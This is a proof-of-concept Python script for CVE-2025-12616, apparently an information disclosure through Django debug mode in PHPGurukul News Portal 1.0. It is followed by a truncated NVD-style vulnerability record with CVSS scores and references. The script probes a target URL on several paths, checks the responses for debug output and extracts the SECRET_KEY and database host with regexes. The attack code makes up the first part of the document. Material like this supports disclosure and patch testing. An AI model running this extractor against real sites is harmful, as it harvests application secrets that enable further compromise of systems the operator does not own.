CVE-2025-12616

# CVE-2025-12616 PoC - PHPGurukul News Portal 1.0 Information Disclosure # Target: PHPGurukul News Portal 1.0 Django Application # Vulnerability: Debug mode enabled exposing sensitive information in /onps/settings.py import requests import re import sys from urllib.parse import urljoin def check_debug_mode(base_url): """Check if debug mode is enabled by triggering an error""" # Common error-inducing paths test_paths = [ '/onps/settings.py', '/nonexistent_page_12345', '/onps/', '/?debug=1', '/trigger_error' ] headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) PoC-Scanner' } for path in test_paths: try: url = urljoin(base_url, path) response = requests.get(url, headers=headers, timeout=10, allow_redirects=False) # Check for debug information indicators debug_indicators = [ r'DEBUG = True', r'Traceback (most recent call last)', r'File ".*settings\.py"', r'Environment Variables', r'DATABASES', r'SECRET_KEY', r'python', # Python traceback indicator r'Django Version' ] content = response.text for indicator in debug_indicators: if re.search(indicator, content, re.IGNORECASE): print(f"[+] Potential debug information found at: {url}") print(f"[+] Matching indicator: {indicator}") # Extract and display sensitive information if 'SECRET_KEY' in content: secret_match = re.search(r"SECRET_KEY['\"]\s*[:=]\s*['\"](.+?)['\"]", content) if secret_match: print(f"[!] Found SECRET_KEY: {secret_match.group(1)}") if 'DATABASES' in content: db_match = re.search(r"HOST['\"]\s*[:=]\s*['\"](.+?)['\"]", content) if db_match: print(f"[!] Found database host: {db_match.group(1)}") return True except requests.RequestException as e: print(f"[-] Error accessing {url}: {e}") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve_2025_12616_poc.py <target_url>") print("Example: python cve_2025_12616_poc.py http://target.com") sys.exit(1) target = sys.argv[1].rstrip('/') print(f"[*] Scanning {target} for CVE-2025-12616...") if check_debug_mode(target): print("[+] Vulnerability confirmed: Debug mode is enabled") else: print("[-] No debug information disclosure detected")

{"cve": {"id": "CVE-2025-12616", "sourceIdentifier": "[email protected]", "published": "2025-11-03T04:15:32.240", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was detected in PHPGurukul News Portal 1.0. The impacted element is an unknown function of the file /onps/settings.py. Performing a manipulation results in insertion of sensitive information into debugging code. It is possible to initiate the attack remotely. The attack's complexity is rated as high. The exploitability is regarded as difficult. The exploit is now public and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.9, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 3.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 3.6}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:H/Au:N/C:P/I:N/A:N", "baseScore": 2.6, "accessVector": "NETWORK", "accessComplexity": "HIGH", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "baseSeverity": "LOW", "exploitabilityScore": 4.9, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-215"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:phpgurukul:news_portal:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "70433F59-D09B-4F66-981A-FFE1598906E2"}]}]}], "references": [{"url": "https://github.com/NishantKumar-CSE/News-Portal-Python-Django-Project/blob/main/Information%20Disclosure%20via%20Debug%20Mode.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://phpgurukul.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://vuldb.com/?ctiid.330910", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.330910", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.678649", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://github.com/NishantKumar-CSE/News-Portal-Python-Django-Project/blob/main/Information%20Disclosure%20via%20Debug%20Mode.md", "source": "1 ... (truncated)